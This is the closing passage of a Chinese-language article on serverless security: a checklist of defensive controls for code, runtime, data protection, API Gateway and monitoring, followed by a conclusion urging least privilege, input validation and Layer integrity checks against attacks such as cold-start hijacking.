│ │ - 不记录敏感信息到日志 │
│ │ - 避免使用 eval/exec │
│ │ - 依赖包漏洞扫描 │
│ │ │
│ [ ] 运行时安全 │
│ │ - 启用 VPC 隔离 │
│ │ - 使用安全组限制出站流量 │
│ │ - 设置合理的 timeout 和 memory limit │
│ │ - 启用 X-Ray 追踪 │
│ │ │
│ [ ] 数据保护 │
│ │ - 环境变量不使用明文密钥 │
│ │ - 使用 Secrets Manager 或 Parameter Store │
│ │ - 启用 S3 SSE 和 KMS 加密 │
│ │ - 敏感日志使用 KMS 加密 │
│ │ │
│ [ ] API Gateway │
│ │ - 启用 WAF 规则集 │
│ │ - 配置速率限制 │
│ │ - 启用请求验证 │
│ │ - 使用 JWT 或 API Key 认证 │
│ │ │
│ [ ] 监控与告警 │
│ │ - 配置 CloudWatch 告警 │
│ │ - 监控异常调用模式 │
│ │ - 设置死信队列 │
│ │ - 启用详细的访问日志 │
│ └───────────────────────────────────────────────────────────┘结语 #
Serverless 架构改变了应用的部署方式,但并未消除安全风险。冷启动劫持和权限逃逸攻击提醒我们:在享受弹性伸缩和免运维便利的同时,安全配置的责任始终在开发者手中。通过实施最小权限原则、严格的输入验证、Layer 完整性校验和全面的监控,可以大幅降低 Serverless 环境中的攻击面。
在云原生安全之路上,防御的深度永远决定了系统的安全水位。Serverless 不是银弹,但它确实是构建安全、弹性、可扩展应用的正确方向——只要我们在每一步都保持对安全的敬畏。